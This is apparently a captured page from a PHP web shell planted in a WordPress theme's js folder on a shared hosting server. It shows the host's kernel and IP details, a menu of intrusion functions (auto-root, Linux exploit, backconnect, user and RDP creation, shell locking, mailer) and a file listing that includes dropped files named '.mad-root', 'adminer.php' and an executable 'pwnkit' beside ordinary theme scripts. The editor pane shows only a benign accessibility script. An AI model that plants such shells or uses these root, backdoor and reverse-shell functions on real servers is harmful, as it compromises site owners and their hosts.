Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
themes /
catch-box /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
catchbox-fitvids.js
2.71
KB
-rw-r--r--
catchbox-fitvids.min.js
1.58
KB
-rw-r--r--
catchbox-scrollup.js
393
B
-rw-r--r--
catchbox-scrollup.min.js
314
B
-rw-r--r--
catchbox_slider.js
1.2
KB
-rw-r--r--
html5.js
10.09
KB
-rw-r--r--
html5.min.js
2.58
KB
-rw-r--r--
jquery.cookie.js
3.02
KB
-rw-r--r--
jquery.cookie.min.js
1.26
KB
-rw-r--r--
jquery.cycle.all.js
50.81
KB
-rw-r--r--
jquery.cycle.all.min.js
26.54
KB
-rw-r--r--
jquery.sidr.js
16.64
KB
-rw-r--r--
jquery.sidr.min.js
7.11
KB
-rw-r--r--
navigation.js
1.45
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
skip-link-focus-fix.js
1.03
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : skip-link-focus-fix.js
/** * Makes "skip to content" link work correctly in IE9, Chrome, and Opera * for better accessibility. * * @link http://www.nczonline.net/blog/2013/01/15/fixing-skip-to-content-links/ */ ( function() { var isWebkit = navigator.userAgent.toLowerCase().indexOf( 'webkit' ) > -1, isOpera = navigator.userAgent.toLowerCase().indexOf( 'opera' ) > -1, isIE = navigator.userAgent.toLowerCase().indexOf( 'msie' ) > -1; if ( ( isWebkit || isOpera || isIE ) && document.getElementById && window.addEventListener ) { window.addEventListener( 'hashchange', function() { var id = location.hash.substring( 1 ), element; if ( ! ( /^[A-z0-9_-]+$/.test( id ) ) ) { return; } element = document.getElementById( id ); if ( element ) { if ( ! ( /^(?:a|select|input|button|textarea)$/i.test( element.tagName ) ) ) { element.tabIndex = -1; } element.focus(); // Repositions the window on jump-to-anchor to account for admin bar and border height. window.scrollBy( 0, -53 ); } }, false ); } } )();
Close